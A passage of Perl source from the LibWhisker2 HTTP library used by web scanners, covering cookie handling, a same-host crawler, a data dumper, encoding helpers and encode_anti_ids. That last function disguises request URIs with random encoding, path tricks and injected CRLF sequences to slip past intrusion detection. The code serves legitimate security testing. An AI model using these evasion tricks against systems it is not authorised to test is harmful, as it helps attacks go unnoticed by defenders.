);\n\t\treturn () if ( !defined $domain || $domain eq '' );\n\t\treturn () if ( !defined $url || $url eq '' );\n\t\t$ssl ||= 0;\n\n\t\tmy (@r, $name);\n    foreach $name ( keys %$jarref ) {\n        next if ( $name eq '' );\n        next if ( $$jarref{$name}->[4] > 0 && $ssl == 0 );\n        if ( $domain =~ /$$jarref{$name}->[1]$/i\n                && $url =~ /^$$jarref{$name}->[2])/i ) {\n            push @r, $name;\n        }\n    }\n\n    return @r;\n}\n\n\n########################################################################\n\n=item B<cookie_set>\n\nParams: $jar, $name, $value, $domain, $path, $expire, $secure\n\nReturn: nothing\n\nSet the named cookie with the provided values into the %jar.  $name is\nrequired to be a non-empty string.  $value is required, and will delete\nthe named cookie from the $jar if it is an empty string.  $domain and\n$path can be strings or undefined.  $expire is ignored (but exists\nfor backwards-compatibility).  $secure should be the numeric value of\n0 or 1.\n\n=cut\n\nsub cookie_set {\n    my ( $jarref, $name, $value, $domain, $path, $expire, $secure ) = @_;\n    my @construct;\n\n    return if ( !( defined $jarref && ref($jarref) ) );\n\n    return if ( $name eq '' );\n    if ( !defined $value || $value eq '' ) {\n        delete $$jarref{$name};\n        return;\n    }\n    $path   = $path   || '/';\n    $secure = $secure || 0;\n\n    @construct = ( $value, $domain, $path, undef, $secure );\n    $$jarref{$name} = \\@construct;\n}\n\n########################################################################\n\n\n#####################################################\n\n# cluster global variables\n%_crawl_config = (\n    'save_cookies'         => 0,\n    'reuse_cookies'        => 1,\n    'save_offsites'        => 0,\n    'save_non_http'        => 0,\n    'follow_moves'         => 1,\n    'url_limit'            => 1000,\n    'use_params'           => 0,\n    'params_double_record' => 0,\n    'skip_ext'             => {\n        gif => 1,\n        jpg => 1,\n        png => 1,\n        gz  => 1,\n        swf => 1,\n        pdf => 1,\n        zip => 1,\n        wav => 1,\n        mp3 => 1,\n        asf => 1,\n        tgz => 1\n    },\n    'save_skipped'    => 0,\n    'save_referrers'  => 0,\n    'use_referrers'   => 1,\n    'do_head'         => 0,\n    'callback'        => 0,\n    'netloc_bug'      => 1,\n    'normalize_uri'   => 1,\n    'source_callback' => 0\n);\n\n%_crawl_linktags = (\n    'a'          => 'href',\n    'applet'     => [qw(codebase archive code)],\n    'area'       => 'href',\n    'base'       => 'href',\n    'bgsound'    => 'src',\n    'blockquote' => 'cite',\n    'body'       => 'background',\n    'del'        => 'cite',\n    'embed'      => [qw(src pluginspage)],\n    'form'       => 'action',\n    'frame'      => [qw(src longdesc)],\n    'iframe'     => [qw(src longdesc)],\n    'ilayer'     => 'background',\n    'img'        => [qw(src lowsrc longdesc usemap)],\n    'input'      => [qw(src usemap)],\n    'ins'        => 'cite',\n    'isindex'    => 'action',\n    'head'       => 'profile',\n    'layer'      => [qw(background src)],\n    'link'       => 'href',\n\n    #\t 'meta'    => 'http-equiv',\n    'object' => [qw(codebase data archive usemap)],\n    'q'      => 'cite',\n    'script' => 'src',\n    'table'  => 'background',\n    'td'     => 'background',\n    'th'     => 'background',\n    'xmp'    => 'href',\n);\n\n#####################################################\n\n=item B<crawl_new>\n\nParams: $START, $MAX_DEPTH, \\%request_hash [, \\%tracking_hash ]\n\nReturn: $crawl_object\n\nThe crawl_new() functions initializes a crawl object (hash) to the default\nvalues, and then returns it for later use by crawl().  $START is the starting\nURL (in the form of 'http://www.host.com/url'), and MAX_DEPTH is the maximum\nnumber of levels to crawl (the START URL counts as 1, so a value of 2 will\ncrawl the START URL and all URLs found on that page).  The request_hash\nis a standard initialized request hash to be used for requests; you should\nset any authentication information or headers in this hash in order for\nthe crawler to use them.  The optional tracking_hash lets you supply a\nhash for use in tracking URL results (otherwise crawl_new() will allocate\na new anon hash).\n\n=cut\n\nsub crawl_new {\n    my ( $start, $depth, $reqref, $trackref ) = @_;\n    my %X;\n\n    return undef if ( !defined $start  || !defined $depth );\n    return undef if ( !defined $reqref || !ref($reqref) );\n    $trackref = {} if ( !defined $trackref || !ref($trackref) );\n\n    $X{track}   = $trackref;\n    $X{request} = $reqref;\n    $X{depth}   = $depth || 2;\n    $X{start}   = $start;\n    $X{magic}   = 7340;\n\n    $X{reset} = sub {\n        $X{errors}      = [];    # all errors encountered\n        $X{urls}        = [];    # temp; used to hold all URLs on page\n        $X{server_tags} = {};    # all server tags found\n        $X{referrers}   = {};    # who refers to what URLs\n        $X{offsites}    = {};    # all URLs that point offsite\n        $X{response}    = {};    # temp; the response hash\n        $X{non_http}    = {};    # all non_http URLs found\n        $X{cookies}     = {};    # all cookies found\n        $X{forms}       = {};    # all forms found\n        $X{jar}         = {};    # temp; cookie jar\n        $X{url_queue}   = [];    # temp; URLs to still fetch\n\n        $X{config} = {};\n        %{ $X{config} } = %_crawl_config;\n\n        %{ $X{track} } = ();\n        $X{parsed_page_count} = 0;\n    };\n\n    $X{crawl} = sub { crawl( \\%X, @_ ) };\n    $X{reset}->();\n\n    return \\%X;\n}\n\n#####################################################\n\n=item B<crawl>\n\nParams: $crawl_object [, $START, $MAX_DEPTH ]\n\nReturn: $count [ undef on error ]\n\nThe heart of the crawl package.  Will perform an HTTP crawl on the\nspecified HOST, starting at START URI, proceeding up to MAX_DEPTH.\n\nCrawl_object needs to be the variable returned by crawl_new().  You can\nalso indirectly call crawl() via the crawl_object itself:\n\n\t$crawl_object->{crawl}->($START,$MAX_DEPTH)\n\nReturns the number of URLs actually crawled (not including those skipped).\n\n=cut\n\n{    # START OF CRAWL CONTAINER\n\n    sub crawl {\n        my ( $C, $START, $MAX_DEPTH ) = @_;\n        return undef if ( !defined $C || !ref($C) || $C->{magic} != 7340 );\n\n        # shortcuts, to reduce dereferences and typing\n        my $CONFIG = $C->{config};\n        my $TRACK  = $C->{track};\n        my $URLS   = $C->{urls};\n        my $RESP   = $C->{response};\n        my $REQ    = $C->{request};\n        my $Q      = $C->{url_queue};\n\n        $START ||= $C->{start};\n        $C->{depth} = $MAX_DEPTH || $C->{depth};\n\n        my ( $COUNT, $T, @ST ) = ( 0, '' );\n\n        # ST[] = [ 0.HOST, 1.PORT, 2.URL, 3.DEPTH, 4.CWD, 5.REF ]\n\n        my @v = uri_split($START);\n\n        my $error = undef;\n        $error = 'Start protocol not http or https'\n          if ( $v[1] ne 'http' && $v[1] ne 'https' );\n        $error = 'Bad start host' if ( !defined $v[2] || $v[2] eq '' );\n        push( @{ $C->{errors} }, $error ) && return undef if ( defined $error );\n\n        @ST = ( $v[2], $v[3], $v[0], 1, '', '' );\n\n        $REQ->{whisker}->{ssl}  = 1 if ( $v[1] eq 'https' );\n        $REQ->{whisker}->{host} = $ST[0];\n        $REQ->{whisker}->{port} = $ST[1];\n        $REQ->{whisker}->{lowercase_incoming_headers} = 1;\n        $REQ->{whisker}->{ignore_duplicate_headers}   = 0;\n        delete $REQ->{whisker}->{parameters};\n        http_fixup_request($REQ);\n\n        push @$Q, \\@ST;\n\n        while (@$Q) {\n            @ST = @{ shift @$Q };\n\n            next if ( defined $TRACK->{ $ST[2] } && $TRACK->{ $ST[2] } ne '?' );\n            if ( $ST[3] > $C->{depth} ) {\n                $TRACK->{ $ST[2] } = '?' if ( $CONFIG->{save_skipped} > 0 );\n                next;\n            }\n\n            $ST[4] = uri_get_dir( $ST[2] );\n            $REQ->{whisker}->{uri} = $ST[2];\n            if ( $ST[5] ne '' && $CONFIG->{use_referrers} > 0 ) {\n                $REQ->{Referrer} = $ST[5];\n            }\n\n            my $result = _crawl_do_request( $REQ, $RESP, $C );\n            if ( $result == 1 || $result == 2 ) {\n                push @{ $C->{errors} }, \"$ST[2]: $RESP->{whisker}->{error}\";\n                next;\n            }\n\n            $COUNT++;\n            $TRACK->{ $ST[2] } = $RESP->{whisker}->{code}\n              if ( $result == 0 || $result == 4 );\n            $TRACK->{ $ST[2] } = '?'\n              if ( ( $result == 3 || $result == 5 )\n                && $CONFIG->{save_skipped} > 0 );\n\n            if ( defined $RESP->{server} && !ref( $RESP->{server} ) ) {\n                $C->{server_tags}->{ $RESP->{server} }++;\n            }\n\n            if ( defined $RESP->{'set-cookie'} ) {\n                if ( $CONFIG->{save_cookies} > 0 ) {\n                    if ( ref( $RESP->{'set-cookie'} ) ) {\n                        $C->{cookies}->{$_}++\n                          foreach ( @{ $RESP->{'set-cookie'} } );\n                    }\n                    else {\n                        $C->{cookies}->{ $RESP->{'set-cookie'} }++;\n                    }\n                }\n                cookie_read( $C->{jar}, $RESP )\n                  if ( $CONFIG->{reuse_cookies} > 0 );\n            }\n\n            next if ( $result == 4 || $result == 5 );\n            next if ( scalar @$Q > $CONFIG->{url_limit} );\n\n            if ( $result == 0 ) {    # page should be parsed\n                if ( $CONFIG->{source_callback} != 0\n                    && ref( $CONFIG->{source_callback} ) eq 'CODE' )\n                {\n                    &{ $CONFIG->{source_callback} }($C);\n                }\n\n                html_find_tags( \\$RESP->{whisker}->{data},\n                    \\&_crawl_extract_links_test, 0, $C, \\%_crawl_linktags );\n                $C->{parsed_page_count}++;\n            }\n\n            push @$URLS, $RESP->{location} if ( $result == 3 );\n\n            foreach $T (@$URLS) {\n                $T =~ tr/\\0\\r\\n//d;\n                next if ( length($T) == 0 );\n                next if ( $T =~ /^#/i );       # fragment\n\n                push @{ $C->{referrers}->{$T} }, $ST[2]\n                  if ( $CONFIG->{save_referrers} > 0 );\n\n                if (   $T =~ /^([a-zA-Z0-9]*):/\n                    && lc($1) ne 'http'\n                    && lc($1) ne 'https' )\n                {\n                    push @{ $C->{non_http}->{$T} }, $ST[2]\n                      if ( $CONFIG->{save_non_http} > 0 );\n                    next;\n                }\n\n                if ( substr( $T, 0, 2 ) eq '//' && $CONFIG->{netloc_bug} > 0 ) {\n                    if ( $REQ->{whisker}->{ssl} > 0 ) { $T = 'https:' . $T; }\n                    else { $T = 'http:' . $T; }\n                }\n                if ( $CONFIG->{callback} != 0 ) {\n                    next if &{ $CONFIG->{callback} }( $T, $C );\n                }\n\n                $T = uri_absolute( $T, $ST[4], $CONFIG->{normalize_uri} );\n\n                # (uri,protocol,host,port,params,frag,user,pass)\n                @v = uri_split($T);\n\n                # make sure URL is on same host and port\n                if (   ( defined $v[2] && $v[2] ne $ST[0] )\n                    || ( $v[3] > 0 && $v[3] != $ST[1] ) )\n                {\n                    $C->{offsites}->{ uri_join(@v) }++\n                      if ( $CONFIG->{save_offsites} > 0 );\n                    next;\n                }\n\n                if ( $v[0] =~ /\\.([a-z0-9]+)$/i ) {\n                    if ( defined $CONFIG->{skip_ext}->{ lc($1) } ) {\n                        $TRACK->{ $v[0] } = '?'\n                          if ( $CONFIG->{save_skipped} > 0 );\n                        next;\n                    }\n                }\n\n                if ( defined $v[4] && $CONFIG->{use_params} > 0 ) {\n                    $TRACK->{ $v[0] } = '?'\n                      if ( $CONFIG->{params_double_record} > 0\n                        && !defined $TRACK->{ $v[0] } );\n                    $v[0] = $v[0] . '?' . $v[4];\n                }\n\n                next\n                  if ( defined $TRACK->{ $v[0] } )\n                  ;    # we've processed this already\n\n                # ST[] = [ 0.HOST, 1.PORT, 2.URL, 3.DEPTH, 4.CWD, 5.REF ]\n                push @$Q, [ $ST[0], $ST[1], $v[0], $ST[3] + 1, '', $ST[2] ];\n            }    # foreach\n\n            @$URLS = ();    # reset for next round\n        }    # while\n\n        return $COUNT;\n    }    # end sub crawl\n\n#####################################################\n\n    sub _crawl_extract_links_test {\n        my ( $TAG, $hr, $dr, $start, $len, $OBJ ) = ( lc(shift), @_ );\n\n        return undef if ( !scalar %$hr );    # fastpath quickie\n\n        # we know this is defined, due to our tagmap\n        my $t = $_crawl_linktags{$TAG};\n\n\t# lowercase tags for normalization to prevent undefined behavior\n\t# See: https://github.com/sullo/nikto/issues/142\n\t$hr = { map lc, %$hr };\n\n        while ( my ( $key, $val ) = each %$hr ) {    # normalize element values\n            $$hr{ $key } = $val;\n        }\n\n        # all of this just to catch meta refresh URLs\n        if (   $TAG eq 'meta'\n            && defined $$hr{'http-equiv'}\n            && $$hr{'http-equiv'} eq 'refresh'\n            && defined $$hr{'content'}\n            && $$hr{'content'} =~ m/url=(.+)/i )\n        {\n            push( @{ $OBJ->{urls} }, $1 );\n\n        }\n        elsif ( ref($t) ) {\n            foreach (@$t) {\n                push( @{ $OBJ->{urls} }, $$hr{$_} ) if ( defined $$hr{$_} );\n            }\n        }\n        else {\n            push( @{ $OBJ->{urls} }, $$hr{$t} ) if ( defined $$hr{$t} );\n        }\n\n        if ( $TAG eq 'form' && defined $$hr{action} ) {\n            my $u = $OBJ->{response}->{whisker}->{uri};\n            $OBJ->{forms}->{ uri_absolute( $$hr{action}, $u, 1 ) }++;\n        }\n\n        return undef;\n    }\n\n################################################################\n\n    sub _crawl_do_request_ex {\n        my ( $hrin, $hrout, $OBJ ) = @_;\n        my $ret;\n\n        $ret = http_do_request( $hrin, $hrout );\n\n        return ( 2, $ret )\n          if ( $ret == 2 );     # if there was connection error, do not continue\n        if   ( $ret == 0 ) {    # successful request\n\n            # WARNING: what if *all* HEAD respones are 302'd on purpose, but\n            #          all GETs are normal?\n            if (   $$hrout{whisker}->{code} < 308\n                && $$hrout{whisker}->{code} > 300 )\n            {\n                if ( $OBJ->{config}->{follow_moves} > 0 ) {\n                    return ( 3, $ret )\n                      if ( defined $$hrout{location}\n                        && !ref( $$hrout{location} ) );\n                }\n                return ( 5, $ret );    # not avail\n            }\n\n            if ( $$hrout{whisker}->{code} == 200 ) {\n\n                # no content-type is treated as text/htm\n                if ( defined $$hrout{'content-type'}\n                    && $$hrout{'content-type'} !~ /^text\\/htm/i )\n                {\n                    return ( 4, $ret );\n                }\n            }\n        }\n        return ( -1, $ret );    # fallthrough\n    }\n\n################################################################\n\n    sub _crawl_do_request {\n        my ( $hrin, $hrout, $OBJ ) = @_;\n        my ( $cret, $lwret );\n\n        if ( $OBJ->{config}->{do_head} && $$hrin{whisker}->{method} ne 'HEAD' )\n        {\n            my $save = $$hrin{whisker}->{method};\n            $$hrin{whisker}->{method} = 'HEAD';\n            ( $cret, $lwret ) = _crawl_do_request_ex( $hrin, $hrout, $OBJ );\n            $$hrin{whisker}->{method} = $save;\n\n            return $cret if ( $cret > 0 );\n\n            if ( $lwret == 0 ) {    # successful request\n                if ( $$hrout{whisker}->{code} == 501 ) {    # HEAD not allowed\n                    $OBJ->{config}->{do_head} = 0;    # no more HEAD requests\n                }\n            }\n\n            # request errors are essentially redone via GET, below\n        }\n\n        ( $cret, $lwret ) = _crawl_do_request_ex( $hrin, $hrout, $OBJ );\n        return $lwret if ( $cret < 0 );\n        return $cret;\n    }\n\n}    # CRAWL_CONTAINER\n\n################################################################\n\n\n########################################################################\n\n=item B<dump>\n\nParams: $name, \\@array [, $name, \\%hash, $name, \\$scalar ]\n\nReturn: $code [ undef on error ]\n\nThe dump function will take the given $name and data reference, and\nwill create an ASCII perl code representation suitable for eval'ing\nlater to recreate the same structure.  $name is the name of the variable\nthat it will be saved as.  Example:\n\n $output = LW2::dump('request',\\%request);\n\nNOTE: dump() creates anonymous structures under the name given.  For\nexample, if you dump the hash %hin under the name 'hin', then when you\neval the dumped code you will need to use %$hin, since $hin is now a\n*reference* to a hash.\n\n=cut\n\nsub dump {\n    my %what = @_;\n    my ( $final, $k, $v ) = ('');\n    while ( ( $k, $v ) = each %what ) {\n        return undef if ( ref($k) || !ref($v) );\n        $final .= \"\\$$k = \" . _dump( 1, $v, 1 );\n        $final =~ s#,\\n$##;\n        $final .= \";\\n\";\n    }\n    return $final;\n}\n\n########################################################################\n\n=item B<dump_writefile>\n\nParams: $file, $name, \\@array [, $name, \\%hash, $name, \\@scalar ]\n\nReturn: 0 if success; 1 if error\n\nThis calls dump() and saves the output to the specified $file.\n\nNote: LW does not checking on the validity of the file name, it's\ncreation, or anything of the sort.  Files are opened in overwrite\nmode.\n\n=cut\n\nsub dump_writefile {\n    my $file   = shift;\n    my $output = &dump(@_);\n    return 1 if ( !open( OUT, \">$file\" ) || !defined $output );\n    binmode(OUT);\n    print OUT $output;\n    close(OUT);\n}\n\n########################################################################\n\nsub _dump {    # dereference and dump an element\n    my ( $t,   $ref, $depth ) = @_;\n    my ( $out, $k,   $v )     = ('');\n    $depth ||= 1;\n\n    # to protect against circular loops\n    return 'undef' if ( $depth > 128 );\n\n    if ( !defined $ref ) {\n        return 'undef';\n    }\n    elsif ( ref($ref) eq 'HASH' ) {\n        $out .= \"{\\n\";\n        while ( ( $k, $v ) = each %$ref ) {\n#            next if ( $k eq '' );\n            $out .= \"\\t\" x $t;\n            $out .= _dumpd($k) . ' => ';\n            if ( ref($v) ) { $out .= _dump( $t + 1, $v, $depth + 1 ); }\n            else { $out .= _dumpd($v); }\n            $out .= \",\\n\" unless ( substr( $out, -2, 2 ) eq \",\\n\" );\n        }\n        $out =~ s#,\\n$#\\n#;\n        $out .= \"\\t\" x ( $t - 1 );\n        $out .= \"},\\n\";\n    }\n    elsif ( ref($ref) eq 'ARRAY' ) {\n        $out .= \"[\";\n        if ( ~~@$ref ) {\n            $out .= \"\\n\";\n            foreach $v (@$ref) {\n                $out .= \"\\t\" x $t;\n                if ( ref($v) ) { $out .= _dump( $t + 1, $v, $depth + 1 ); }\n                else { $out .= _dumpd($v); }\n                $out .= \",\\n\" unless ( substr( $out, -2, 2 ) eq \",\\n\" );\n            }\n            $out =~ s#,\\n$#\\n#;\n            $out .= \"\\t\" x ( $t - 1 );\n        }\n        $out .= \"],\\n\";\n    }\n    elsif ( ref($ref) eq 'SCALAR' ) {\n        $out .= _dumpd($$ref);\n    }\n    elsif ( ref($ref) eq 'REF' ) {\n        $out .= _dump( $t, $$ref, $depth + 1 );\n    }\n    elsif ( ref($ref) ) {    # unknown/unsupported ref\n        $out .= \"undef\";\n    }\n    else {                   # normal scalar\n        $out .= _dumpd($ref);\n    }\n    return $out;\n}\n\n########################################################################\n\nsub _dumpd {                 # escape a scalar string\n    my $v = shift;\n    return 'undef' if ( !defined $v );\n    return \"''\"    if ( $v eq '' );\n    return \"$v\"    if ( $v eq '0' || $v !~ tr/0-9//c && $v !~ m#^0+# );\n    if ( $v !~ tr/ !-~//c ) {\n        $v =~ s/(['\\\\])/\\\\$1/g;\n        return \"'$v'\";\n    }\n    $v =~ s#\\\\#\\\\\\\\#g;\n    $v =~ s#\"#\\\\\"#g;\n    $v =~ s#\\r#\\\\r#g;\n    $v =~ s#\\n#\\\\n#g;\n    $v =~ s#\\t#\\\\t#g;\n    $v =~ s#\\$#\\\\\\$#g;\n    $v =~ s#([^!-~ ])#sprintf('\\\\x%02x',ord($1))#eg;\n    return \"\\\"$v\\\"\";\n}\n\n########################################################################\n\n\n########################################################################\n\n{    # package variables\n    my $MIMEBASE64_TRYLOADING = 1;\n\n########################################################################\n\n=item B<encode_base64>\n\nParams: $data [, $eol]\n\nReturn: $b64_encoded_data\n\nThis function does Base64 encoding.  If the binary MIME::Base64 module\nis available, it will use that; otherwise, it falls back to an internal\nperl version.  The perl version carries the following copyright:\n\n Copyright 1995-1999 Gisle Aas <gisle@aas.no>\n\nNOTE: the $eol parameter will be inserted every 76 characters.  This is\nused to format the data for output on a 80 character wide terminal.\n\n=cut\n\n    sub encode_base64 {\n        if ($MIMEBASE64_TRYLOADING) {\n            eval \"require MIME::Base64\";\n            $MIMEBASE64_TRYLOADING = 0;\n        }\n        goto &MIME::Base64::encode_base64 if ($MIME::Base64::VERSION);\n        my $res = \"\";\n        my $eol = $_[1];\n        $eol = \"\\n\" unless defined $eol;\n        pos( $_[0] ) = 0;\n        while ( $_[0] =~ /(.{1,45})/gs ) {\n            $res .= substr( pack( 'u', $1 ), 1 );\n            chop($res);\n        }\n        $res =~ tr|` -_|AA-Za-z0-9+/|;\n        my $padding = ( 3 - length( $_[0] ) % 3 ) % 3;\n        $res =~ s/.{$padding}$/'=' x $padding/e if $padding;\n        if ( length $eol ) {\n            $res =~ s/(.{1,76})/$1$eol/g;\n        }\n        $res;\n    }\n\n########################################################################\n\n=item B<decode_base64>\n\nParams: $data\n\nReturn: $b64_decoded_data\n\nA perl implementation of base64 decoding.  The perl code for this function\nwas actually taken from an older MIME::Base64 perl module, and bears the\nfollowing copyright:\n\nCopyright 1995-1999 Gisle Aas <gisle@aas.no>\n\n=cut\n\n    sub decode_base64 {\n        if ($MIMEBASE64_TRYLOADING) {\n            eval \"require MIME::Base64\";\n            $MIMEBASE64_TRYLOADING = 0;\n        }\n        goto &MIME::Base64::decode_base64 if ($MIME::Base64::VERSION);\n        my $str = shift;\n        my $res = \"\";\n        $str =~ tr|A-Za-z0-9+=/||cd;\n        $str =~ s/=+$//;                # remove padding\n        $str =~ tr|A-Za-z0-9+/| -_|;    # convert to uuencoded format\n        while ( $str =~ /(.{1,60})/gs ) {\n            my $len = chr( 32 + length($1) * 3 / 4 );    # compute length byte\n            $res .= unpack( \"u\", $len . $1 );            # uudecode\n        }\n        $res;\n    }\n\n########################################################################\n\n}    # end package variables\n\n########################################################################\n\n=item B<encode_uri_hex>\n\nParams: $data\n\nReturn: $result\n\nThis function encodes every character (except the / character) with normal\nURL hex encoding.\n\n=cut\n\nsub encode_uri_hex {    # normal hex encoding\n    my $str = shift;\n    $str =~ s/([^\\/])/sprintf(\"%%%02x\",ord($1))/ge;\n    return $str;\n}\n\n#########################################################################\n\n=item B<encode_uri_randomhex>\n\nParams: $data\n\nReturn: $result\n\nThis function randomly encodes characters (except the / character) with\nnormal URL hex encoding.\n\n=cut\n\nsub encode_uri_randomhex {    # random normal hex encoding\n    my @T = split( //, shift );\n    my $s;\n    foreach (@T) {\n        if (m#[;=:&@\\?]#) {\n            $s .= $_;\n            next;\n        }\n        if ( ( rand() * 2 ) % 2 == 1 ) { $s .= sprintf( \"%%%02x\", ord($_) ); }\n        else { $s .= $_; }\n    }\n    return $s;\n}\n\n#########################################################################\n\n=item B<encode_uri_randomcase>\n\nParams: $data\n\nReturn: $result\n\nThis function randomly changes the case of characters in the string.\n\n=cut\n\nsub encode_uri_randomcase {\n    my ( $x, $uri ) = ( '', shift );\n    return $uri if ( $uri !~ tr/a-zA-Z// );    # fast-path\n    my @T = split( //, $uri );\n    for ( $x = 0 ; $x < ( scalar @T ) ; $x++ ) {\n        if ( ( rand() * 2 ) % 2 == 1 ) {\n            $T[$x] =~ tr/A-Za-z/a-zA-Z/;\n        }\n    }\n    return join( '', @T );\n}\n\n#########################################################################\n\n=item B<encode_unicode>\n\nParams: $data\n\nReturn: $result\n\nThis function converts a normal string into Windows unicode format\n(non-overlong or anything fancy).\n\n=cut\n\nsub encode_unicode {\n    my ( $c, $r ) = ( '', '' );\n    foreach $c ( split( //, shift ) ) {\n        $r .= pack( \"v\", ord($c) );\n    }\n    return $r;\n}\n\n#########################################################################\n\n=item B<decode_unicode>\n\nParams: $unicode_string\n\nReturn: $decoded_string\n\nThis function attempts to decode a unicode (UTF-8) string by\nconverting it into a single-byte-character string.  Overlong\ncharacters are converted to their standard characters in place;\nnon-overlong (aka multi-byte) characters are substituted with the\n0xff; invalid encoding characters are left as-is.\n\nNote: this function is useful for dealing with the various unicode\nexploits/vulnerabilities found in web servers; it is *not* good for\ndoing actual UTF-8 parsing, since characters over a single byte are\nbasically dropped/replaced with a placeholder.\n\n=cut\n\nsub decode_unicode {\n    my $str = $_[0];\n    return $str if ( $str !~ tr/!-~//c );    # fastpath\n    my ( $lead, $count, $idx );\n    my $out = '';\n    my $len = length($str);\n    my ( $ptr, $no, $nu ) = ( 0, 0, 0 );\n\n    while ( $ptr < $len ) {\n        my $c = substr( $str, $ptr, 1 );\n        if ( ord($c) >= 0xc0 && ord($c) <= 0xfd ) {\n            $count = 0;\n            $c     = ord($c) << 1;\n            while ( ( $c & 0x80 ) == 0x80 ) {\n                $c <<= 1;\n                last if ( $count++ == 4 );\n            }\n            $c = ( $c & 0xff );\n            for ( $idx = 1 ; $idx < $count ; $idx++ ) {\n                my $o = ord( substr( $str, $ptr + $idx, 1 ) );\n                $no = 1 if ( $o != 0x80 );\n                $nu = 1 if ( $o < 0x80 || $o > 0xbf );\n            }\n            my $o = ord( substr( $str, $ptr + $idx, 1 ) );\n            $nu = 1 if ( $o < 0x80 || $o > 0xbf );\n            if ($nu) {\n                $out .= substr( $str, $ptr++, 1 );\n            }\n            else {\n                if ($no) {\n                    $out .= \"\\xff\";    # generic replacement char\n                }\n                else {\n                    my $prior =\n                      ord( substr( $str, $ptr + $count - 1, 1 ) ) << 6;\n                    $out .= pack( \"C\",\n                        (( ord( substr( $str, $ptr + $count, 1 ) ) & 0x7f ) +\n                          $prior ) & 255 );\n                }\n                $ptr += $count + 1;\n            }\n            $no = $nu = 0;\n        }\n        else {\n            $out .= $c;\n            $ptr++;\n        }\n    }\n    return $out;\n}\n\n########################################################################\n\n=item B<encode_anti_ids>\n\nParams: \\%request, $modes\n\nReturn: nothing\n\nencode_anti_ids computes the proper anti-ids encoding/tricks\nspecified by $modes, and sets up %hin in order to use those tricks.\nValid modes are (the mode numbers are the same as those found in whisker\n1.4):\n\n=over 4\n\n=item 1 Encode some of the characters via normal URL encoding\n\n=item 2 Insert directory self-references (/./)\n\n=item 3 Premature URL ending (make it appear the request line is done)\n\n=item 4 Prepend a long random string in the form of \"/string/../URL\"\n\n=item 5 Add a fake URL parameter\n\n=item 6 Use a tab instead of a space as a request spacer\n\n=item 7 Change the case of the URL (works against Windows and Novell)\n\n=item 8 Change normal separators ('/') to Windows version ('\\')\n\n=item 9 Session splicing [NOTE: not currently available]\n\n=item A Use a carriage return (0x0d) as a request spacer\n\n=item B Use binary value 0x0b as a request spacer\n\n=back\n\nYou can set multiple modes by setting the string to contain all the modes\ndesired; i.e. $modes=\"146\" will use modes 1, 4, and 6.\n\n=cut\n\nsub encode_anti_ids {\n    my ( $rhin, $modes ) = ( shift, shift );\n    my ( @T, $x, $c, $s, $y );\n    my $ENCODED = 0;\n    my $W       = $$rhin{'whisker'};\n\n    return if ( !( defined $rhin && ref($rhin) ) );\n\n    # in case they didn't do it already\n    $$rhin{'whisker'}->{'uri_orig'} = $$rhin{'whisker'}->{'uri'};\n\n    # note: order is important!\n\n    # mode 9 - session splicing\n    #if($modes=~/9/){\n    #\t$$rhin{'whisker'}->{'ids_session_splice'}=1;\n    #}\n\n    # mode 4 - prepend long random string\n    if ( $modes =~ /4/ ) {\n        $s = '';\n        if ( $$W{'uri'} =~ m#^/# ) {\n            $y = &utils_randstr;\n            $s .= $y while ( length($s) < 512 );\n            $$W{'uri'} = \"/$s/..\" . $$W{'uri'};\n        }\n    }\n\n    # mode 7  - (windows) random case sensitivity\n    if ( $modes =~ /7/ ) {\n        $$W{'uri'} = encode_uri_randomcase( $$W{'uri'} );\n    }\n\n    # mode 2 - directory self-reference (/./)\n    if ( $modes =~ /2/ ) {\n        $$W{'uri'} =~ s#/#/./#g;\n    }\n\n    # mode 8 - windows directory separator (\\)\n    if ( $modes =~ /8/ ) {\n        $$W{'uri'} =~ s#/#\\\\#g;\n        $$W{'uri'} =~ s#^\\\\#/#;\n        $$W{'uri'} =~ s#^([a-zA-Z0-9_]+):\\\\#$1://#;\n        $$W{'uri'} =~ s#\\\\$#/#;\n    }\n\n    # mode 1 - random URI (non-UTF8) encoding\n    if ( $modes =~ /1/ ) {\n        if ( $ENCODED == 0 ) {\n            $$W{'uri'} = encode_uri_randomhex( $$W{'uri'} );\n            $ENCODED = 1;\n        }\n    }\n\n    # mode 5 - fake parameter\n    if ( $modes =~ /5/ ) {\n        ( $s, $y ) = ( &utils_randstr, &utils_randstr );\n        $$W{'uri'} = \"/$s.html%3F$y=/../$$W{'uri'}\";\n    }\n\n    # mode 3 - premature URL ending\n    if ( $modes =~ /3/ ) {\n        $s = &utils_randstr;\n        $$W{'uri'} = \"/%20HTTP/1.1%0d%0aAccept%3a%20$s/../..$$W{'uri'}\";\n    }\n\n    # mode 6 - TAB as request spacer\n    if ( $modes =~ /6/ ) {\n        $$W{'http_space1'} = \"\\t\";\n    }\n\n    # mode A - CR as request spacer\n    if ( $modes =~ /A/i ) {\n        $$W{'http_space1'} = $$W{'http_space2'} = \"\\x0d\";\n    }\n\n    # mode B - 0x0b as request spacer\n    if ( $modes =~ /B/i ) {\n        $$W{'http_space1'} = $$W{'http_space2'} = \"\\x0b\";\n    }\n\n}\n\n\n=item B<FORMS FUNCTIONS>\n\nThe goal is to parse the variable, human-readable HTML into concrete\nstructures usable by your program.  The forms functions does do a good job\nat making these structures, but I will admit: they are not exactly simple,\nand thus not a cinch to work with.  But then again, representing something\nas complex as a HTML form is not a simple thing either.  I think the\nresults are acceptable for what's trying to be done.  Anyways...\n\nForms are stored in perl hashes, with elements in the following format:\n\n $form{'element_name'}=@([ 'type', 'value', @params ])\n\nThus every element in the hash is an array of anonymous arrays.  The first\narray value contains the element type (which is 'select', 'textarea',\n'button', or an 'input' value of the form 'input-text', 'input-hidden',\n'input-radio', etc).\n\nThe second value is the value, if applicable (it could be undef if no\nvalue was specified).  Note that select elements will always have an undef\nvalue--the actual values are in the subsequent options elements.\n\nThe third value, if defined, is an anonymous array of additional tag\nparameters found in the element (like 'onchange=\"blah\"', 'size=\"20\"',\n'maxlength=\"40\"', 'selected', etc).\n\nThe array does contain one special element, which is stored in the hash\nunder a NULL character (\"\\0\") key.  This element is of the format:\n\n $form{\"\\0\"}=['name', 'method', 'action', @parameters];\n\nThe element is an anonymous array that contains strings of the form's\nname, method, and action (values can be undef), and a @parameters array\nsimilar to that found in normal elements (above).\n\nAccessing individual values stored in the form hash becomes a test of your\nperl referencing skills.  Hint: to access the 'value' of the third element\nnamed 'choices', you would need to do:\n\n $form{'choices'}->[2]->[1];\n\nThe '[2]' is the third element (normal array starts with 0), and the\nactual value is '[1]' (the type is '[0]', and the parameter array is\n'[2]').\n\n=cut\n\n################################################################\n\n# Cluster global variables\n%_forms_ELEMENTS = (\n    'form'     => 1,\n    